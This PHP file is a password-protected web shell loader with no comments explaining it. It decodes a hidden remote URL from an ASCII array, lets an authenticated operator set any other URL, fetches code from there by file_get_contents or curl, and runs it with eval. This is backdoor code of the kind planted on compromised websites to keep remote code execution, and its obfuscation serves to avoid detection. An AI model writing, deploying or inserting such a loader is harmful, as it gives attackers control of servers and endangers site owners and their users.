<?php
// Start the session at the very beginning
session_start();

// Your URL to fetch content from
$Url = "https://raw.githubusercontent.com/bokaman12/7h3o/refs/heads/main/bandir-put/eikhane/ki/koros/fuck/you/f1.txt";

// Function to fetch content from a URL
function madrid($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

// Decode the ASCII-encoded URL (same as before)
$asciiArray = [
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104,
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111,
    109, 47, 98, 111, 107, 97, 109, 97, 110, 49, 50, 47, 55, 104, 51, 111, 47,
    114, 101, 102, 115, 47, 104, 101, 97, 100, 115, 47, 109, 97, 105, 110, 47,
    98, 97, 110, 100, 105, 114, 45, 112, 117, 116, 47, 101, 105, 107, 104, 97,
    110, 101, 47, 107, 105, 47, 107, 111, 114, 111, 115, 47, 102, 117, 99, 107,
    47, 121, 111, 117, 47, 98, 46, 116, 120, 116
];

$decodedString = '';
foreach ($asciiArray as $ascii) {
    $decodedString .= chr($ascii);
}

$url = $decodedString; // Set the URL from the decoded string

// Correct password hash (make sure this is the correct one you want to use)
$correct_password = '$2y$10$cE1fZ09U/.4d3eT5zPZxE.e0.zOCvq5prclkQ9Z0xhEIV1F.ltnMy';

// If reset is requested, clear the session URL
if (isset($_GET['ts_reset'])) {
    $_SESSION["ts_url"] = "";
    echo "success";
    exit;
}

// Handle authentication if the 'ts' parameter is set
if (isset($_GET['ts'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if (isset($_POST['password'])) {
            $provided_password = $_POST['password'];
            if (password_verify($provided_password, $correct_password)) {
                // Set session flag for successful login
                $_SESSION['ts_auth'] = true; // Store authentication state in session
                $_SESSION["ts_url"] = isset($_POST['url']) ? $_POST['url'] : $url; // Set the URL in session
                // Redirect to same page after authentication
                header("Location: " . $_SERVER['REQUEST_URI']);
                exit;
            } else {
                echo "Invalid password!";
                exit;
            }
        } else {
            echo "No password provided!";
            exit;
        }
    }
} else {
    // Check if the user is authenticated
    if (!isset($_SESSION['ts_auth']) || $_SESSION['ts_auth'] !== true) {
        echo "Unauthorized. Please authenticate first.";
        exit;
    }

    // If the user is authenticated, fetch the URL content
    if (empty($_SESSION["ts_url"])) {
        $result = @file_get_contents($url);
        if (empty($result)) {
            $result = madrid($url);
        }
    } else {
        $result = @file_get_contents($_SESSION["ts_url"]);
        if (empty($result)) {
            $result = madrid($_SESSION["ts_url"]);
        }
    }

    // Display the result of the URL content
    if (is_string($result)) {
        eval('?>' . $result);
    } else {
        echo "Error fetching the content.";
    }
}
?>
